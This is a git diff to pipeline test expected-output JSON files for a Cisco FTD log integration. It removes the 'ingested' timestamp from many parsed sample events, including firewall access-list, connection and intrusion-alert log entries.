@@ -248,7 +242,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593773575Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00",
 "code": ""
 },
@@ -285,7 +278,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593775033Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -322,7 +314,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593776597Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -359,7 +350,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593777966Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -396,7 +386,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593779269Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -433,7 +422,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593780849Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -470,7 +458,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593782283Z",
 "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -507,7 +494,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593783804Z",
 "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -544,7 +530,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593785228Z",
 "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00",
 "code": ""
 },
@@ -581,7 +566,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593786599Z",
 "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00",
 "code": ""
 },
@@ -618,7 +602,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593787956Z",
 "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -655,7 +638,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593789320Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00",
 "code": ""
 },
@@ -692,7 +674,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593790656Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00",
 "code": ""
 },
@@ -729,7 +710,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593791864Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -766,7 +746,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593793175Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00",
 "code": ""
 },
@@ -803,7 +782,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593794621Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00",
 "code": ""
 },
@@ -840,7 +818,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593796069Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration Generation\u0000x0a\u0000x00",
 "code": ""
 },
@@ -877,7 +854,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593797530Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00",
 "code": ""
 },
@@ -914,7 +890,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593798960Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for siem-ftd\u0000x0a\u0000x00",
 "code": ""
 },
@@ -951,7 +926,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593800370Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -988,7 +962,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593802021Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1025,7 +998,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593802924Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1062,7 +1034,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593803990Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1099,7 +1070,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593804887Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1136,7 +1106,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593805808Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1173,7 +1142,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593806705Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1210,7 +1178,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593807615Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1248,7 +1215,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:14.593808508Z",
 "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled",
 "code": ""
 },
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json
index 4c73b0d54fe..9e4592361d0 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json
@@ -64,7 +64,6 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-12-29T10:00:19.695772397Z",
 "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity",
 "code": "430001",
 "kind": "alert",
@@ -178,7 +177,6 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-12-29T10:00:19.695775037Z",
 "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity",
 "code": "430001",
 "kind": "alert",
@@ -290,7 +288,6 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-12-29T10:00:19.695775893Z",
 "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity",
 "code": "430001",
 "kind": "alert",
@@ -400,7 +397,6 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-12-29T10:00:19.695776622Z",
 "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity",
 "code": "430001",
 "kind": "alert",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json
index e378bcbc00d..fb5fe9be3b3 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json
@@ -48,7 +48,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:22.072166898Z",
 "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt",
 "code": "430001",
 "kind": "alert",
@@ -109,7 +108,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:22.072169626Z",
 "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).",
 "code": "430001",
 "kind": "alert",
@@ -167,7 +165,6 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-12-29T10:00:22.072170499Z",
 "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:",
 "code": "430002",
 "kind": "event",
@@ -243,7 +240,6 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-29T10:00:22.072171265Z",
 "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311",
 "code": "430005",
 "kind": "alert",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json
index 0d515820599..3293ed78edd 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-not-ip.log-expected.json
@@ -67,7 +67,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:23.254346331Z",
 "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]",
 "code": "106100",
 "kind": "event",
@@ -132,7 +131,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:23.254349138Z",
 "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233",
 "code": "302021",
 "kind": "event",
@@ -214,7 +212,6 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-29T10:00:23.254350126Z",
 "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware",
 "code": "338204",
 "kind": "event",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json
index cfd680c1cff..f4ef0afa2c5 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json
@@ -48,7 +48,6 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-29T10:00:24.981482640Z",
 "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -118,7 +117,6 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-29T10:00:24.981485280Z",
 "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -188,7 +186,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981486123Z",
 "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -266,7 +263,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981486932Z",
 "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -343,7 +339,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981487698Z",
 "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -413,7 +408,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981488840Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834",
 "code": "305011",
 "kind": "event",
@@ -484,7 +478,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981489612Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)",
 "code": "302013",
 "kind": "event",
@@ -556,7 +549,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981490377Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882",
 "code": "305011",
 "kind": "event",
@@ -631,7 +623,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981491154Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)",
 "code": "302015",
 "kind": "event",
@@ -703,7 +694,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981491925Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392",
 "code": "305011",
 "kind": "event",
@@ -776,7 +766,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981492745Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)",
 "code": "302013",
 "kind": "event",
@@ -850,7 +839,6 @@
 "event": {
 "severity": 6,
 "duration": 5025000000000,
- "ingested": "2021-12-29T10:00:24.981493616Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140",
 "code": "302016",
 "kind": "event",
@@ -923,7 +911,6 @@
 "event": {
 "severity": 6,
 "duration": 36000000000000,
- "ingested": "2021-12-29T10:00:24.981494385Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999",
 "code": "302016",
 "kind": "event",
@@ -991,7 +978,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981495136Z",
 "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233",
 "code": "302021",
 "kind": "event",
@@ -1058,7 +1044,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981495886Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879",
 "code": "305011",
 "kind": "event",
@@ -1131,7 +1116,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T10:00:24.981496642Z",
 "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)",
 "code": "302013",
 "kind": "event",
@@ -1195,7 +1179,6 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-29T10:00:24.981497495Z",
 "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query",
 "code": "106007",
 "kind": "event",
@@ -1261,7 +1244,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981498247Z",
 "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1331,7 +1313,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981499011Z",
 "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1401,7 +1382,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981499771Z",
 "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1471,7 +1451,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981500540Z",
 "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1541,7 +1520,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981501303Z",
 "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1611,7 +1589,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981502057Z",
 "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1681,7 +1658,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981502914Z",
 "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1751,7 +1727,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981503666Z",
 "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1821,7 +1796,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981504421Z",
 "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1891,7 +1865,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981505228Z",
 "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -1957,7 +1930,6 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-29T10:00:24.981505996Z",
 "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside",
 "code": "106006",
 "kind": "event",
@@ -2017,7 +1989,6 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-29T10:00:24.981506748Z",
 "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query",
 "code": "106007",
 "kind": "event",
@@ -2083,7 +2054,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981507501Z",
 "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -2153,7 +2123,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981508247Z",
 "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -2223,7 +2192,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981509076Z",
 "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -2293,7 +2261,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981509831Z",
 "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -2363,7 +2330,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981510586Z",
 "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -2433,7 +2399,6 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-29T10:00:24.981511449Z",
 "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -2503,7 +2468,6 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-29T10:00:24.981512203Z",
 "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -2573,7 +2537,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981513022Z",
 "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -2643,7 +2606,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981513790Z",
 "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]",
 "code": "106100",
 "kind": "event",
@@ -2713,7 +2675,6 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-29T10:00:24.981514547Z",
